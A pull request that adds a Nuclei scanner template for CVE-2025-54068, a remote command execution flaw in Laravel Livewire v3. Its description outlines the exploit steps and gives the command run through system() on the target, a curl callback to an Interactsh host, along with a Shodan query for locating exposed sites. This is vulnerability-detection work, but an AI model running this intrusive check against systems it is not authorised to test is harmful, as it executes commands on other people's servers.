### PR TITLE
Add CVE-2025-54068 - Livewire RCE

### DIFF
--- a/http/cves/2025/CVE-2025-54068.yaml
+++ b/http/cves/2025/CVE-2025-54068.yaml
@@ -5,25 +5,27 @@ info:
   author: flame-11
   severity: critical
   description: |
-    Livewire v3 (Laravel) contains a vulnerability in its component hydration/update
-    mechanism that can be exploited to reach remote command execution (RCE) without
-    authentication under certain conditions.
+    Livewire v3 (Laravel) contains a vulnerability in its component hydration/update mechanism that can be exploited to reach remote command execution (RCE) without authentication under certain conditions.
   impact: |
     An unauthenticated attacker may execute arbitrary commands in the web server context.
   remediation: |
     Upgrade livewire/livewire to a patched version (>= 3.6.4).
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-54068
     - https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3
     - https://github.com/synacktiv/Livepyre
     - https://www.synacktiv.com/en/publications/livewire-remote-command-execution-through-unmarshaling
     - https://www.synacktiv.com/sites/default/files/2025-09/slides-livewire-nullcon2025.pdf
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-54068
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.8
     cve-id: CVE-2025-54068
     cwe-id: CWE-502
+    cpe: cpe:2.3:a:laravel:livewire:*:*:*:*:*:*:*:*
   metadata:
     verified: true
     max-request: 3
+    shodan-query: html:"wire:id"
   tags: cve,cve2025,laravel,livewire,rce,deserialization,oast,intrusive
 
 flow: http(1) && http(2) && http(3)


### PR DESCRIPTION
## Summary
- Adds an HTTP template for **CVE-2025-54068** affecting **Laravel Livewire v3**.
- Uses **Interactsh (OAST)** for behavior-based verification.
- Uses a `flow` gate so the exploit stage only runs when the target page looks like Livewire and stage-1 succeeds.

## Detection logic (high level)
1) **GET** a target page to confirm it is a Livewire v3 component page and extract:
   - `data-csrf`
   - `data-update-uri`
   - `wire:snapshot`
   - first property name from the snapshot `data` object
2) **POST (stage-1)** to the update endpoint to coerce the selected property into an array and obtain a **new signed snapshot** from the server.
3) **POST (stage-2)** using the signed snapshot and a gadget chain to trigger `system()` and execute:
   - `curl -m 4 -fsS http://{{interactsh-url}}/?q={{marker}}`

The template matches only when an **Interactsh HTTP interaction** is received containing `/?q={{marker}}`.

## Requirements / limitations
- **Egress required**: target must be able to reach Interactsh over HTTP.
- **curl required**: the payload uses `curl` (if not present, this will be a false negative).
- **Target path**: the URL must be a page that actually mounts a Livewire component (contains `wire:snapshot`). In real deployments this may not be `/`.
- **Component-dependent**: some component configurations (e.g., strict scalar typed public properties) may block the stage-1 cast-to-array step.
- **Intrusive**: this triggers command execution to prove impact.

## References
- https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3
- https://github.com/synacktiv/Livepyre

## Test plan
- Optional lab: `https://github.com/flame-11/CVE-2025-54068-livewire` (tag: `v1.0`)
- Run:
  - `nuclei -t http/cves/2025/CVE-2025-54068.yaml -u http://localhost:18081/ -nc -debug -interactions-cooldown-period 15`

## Debug proof (trimmed)
```text
[INF] Using Interactsh Server: oast.me
...
[<id>] Received HTTP interaction ...
GET /?q=<marker> HTTP/1.1
Host: <id>.oast.me
```